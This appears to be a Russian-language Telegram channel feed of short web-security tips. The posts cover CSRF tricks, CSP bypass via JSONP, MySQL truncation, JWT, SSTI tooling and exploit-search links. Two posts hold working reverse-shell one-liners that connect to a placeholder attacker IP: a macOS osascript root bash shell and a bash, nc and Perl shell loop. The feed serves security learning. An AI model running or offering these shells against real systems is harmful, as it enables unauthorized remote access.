Уязвимости и атаки на веб-приложения. Чат об одинарных, иногда даже двойных кавычках - @WebPwnChat
Ruby забавно парсит JSON стандартным модулем. В него можно писать комментарии!
Например, если серверная часть не проверяет Content-type запроса на application/json, можно сформировать сценарий для CSRF.
23 Янв 2019
AppleScript — мощный инструмент.
Нужен root shell?
osascript -e "do shell script \"bash -i >& /dev/tcp/%ip%/%port% 0>&1 \" with administrator privileges"
Нужен контроль над другим приложением?
osascript -e 'tell app "Chrome" to display dialog "Hello World"'
(В...
13 Дек 2018
Недавно на ZN:Web Village обсуждались способы обхода Content-Security-Policy, в том числе через использование JSONP колбэков из списка довереных доменов.
И тут в твитторе встретилась неплохая подборка таких коллбеков для самых разных сервисов! https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt
Разберем...
12 Дек 2018
Некоторые заголовки могут работать как HTML теги (и наоборот)
Например, тег
включит соотвествующий CSP, как если бы он был в заголовках.
Заголовок
Refresh: 3;URL=https://hello/
покажет содержимое страницы на три секунды, а потом перенаправит пользователя,...
5 Дек 2018
Bo0oM - I
27 Ноя 2018
Слайды с Web VIllage
#ZeroNights 2018
https://2018.zeronights.ru/en/materials/
27 Ноя 2018
Быстрый поиск по эксплойтам и полезным программам. Enjoy!
https://sploitus.com
11 Сен 2018
Кто подавал данные на заведение CVE через https://iwantacve.org могут с удивлением обнаружить, что заявки помещаются в открытый Google Docs (несмотря на то, что там об этом написано). Причем можно посмотреть как на утвержденные уязвимости (прошедшие модерацию,...
23 Авг 2018
Генератор "полезной" картинки для эксплоита бага на примере Wordpress + WooCommerce
https://rdot.org/forum/showpost.php?p=44060&postcount=66
22 Авг 2018
Не все йогурты одинаково полезны!
В некоторых случаях, такой символ как 💩 — может отрезать часть строки в MySQL (тот случай, когда какое-то говно — альтернатива нульбайту).
Причем выстрелить это может разными способами, например, как для обхода валидации...
22 Авг 2018
В современных браузерах мы можем отправить кросс-ориджин POST запрос без заголовка Content-Type. Это может быть полезно, если сайт для защиты от CSRF чекает Content-Type, но пропускает проверку, если этот заголовок отсутствует. Всё что нужно - создать...
20 Авг 2018
Отдельно про text/plain. Сниффинг содержимого text/plain замечен также у IE 8 если у файла не будет расширения. А с помощью ловкости рук можно заставить выполнить там XSS даже на более свежих версиях, если на ресурсе не запрещена загрузка в фрейме.
https://jankopecky.net/index.php/2017/04/18/0day-textplain-considered-harmful/...
17 Авг 2018
Если у страницы не будет указан Content-Type (передаю привет старику HTTP/0.9) - браузер попытается сам определить содержимое. Тоже самое, если тип контента браузеру не будет знаком. Internet Explorer 8 (спи спокойно Windows XP), например, не признает...
17 Авг 2018
Если ты встречал странный base64 в параметрах веб-приложений, разбитый двумя точками - скорее всего это JSON Web Tokens.
Он состоит из заголовка, содержимого и подписи, считается одним из безопасных способов передачи информации, поддерживает различные...
17 Авг 2018
При внедрении собственных шаблонов в серверные шаблонизаторы (уязвимость SSTI) — эксплуатацию можно автоматизировать с помощью утилиты tplmap. Она и шаблонизатор подберет, и удобный шелл откроет для выполнения произвольного кода. Еще и плагин к Burp Suite...
17 Авг 2018
Годный доклад на OWASP AppSecEU 2018, от Frans Rosén'а
https://speakerdeck.com/fransrosen/owasp-appseceu-2018-attacking-modern-web-technologies?slide=15
17 Авг 2018
Знаете ли вы, что reCAPTCHA (та самая капча от Google) дает возможность выполнять CSRF-атаки?
CSRF-токен — ключ выданный пользователю для предотвращения межсайтовой подделки запросов. Мы тебе дали секретное слово - хочешь отправить данные на сайт, повтори...
17 Авг 2018
Обходим экзотичную CSRF защиту
Сперва ликбез. Засабмитить форму POST-запросом можно со следующими mime type:
a) text/plain
b) application/x-www-form-urlencoded:
param1=a¶m2=b
c) multipart/form-data:
---------------------------974767299852498929531610575
Content-Disposition:...
17 Авг 2018
Не весь кэш одинаково полезен
https://bo0om.ru/web-cache-deception-attack
17 Авг 2018
На случай важных переговоров:
while true;do bash -i >& /dev/tcp/IP/1337 0>&1;nc -e /bin/sh IP 1337;perl -e 'use Socket;$i="IP";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh...
17 Авг 2018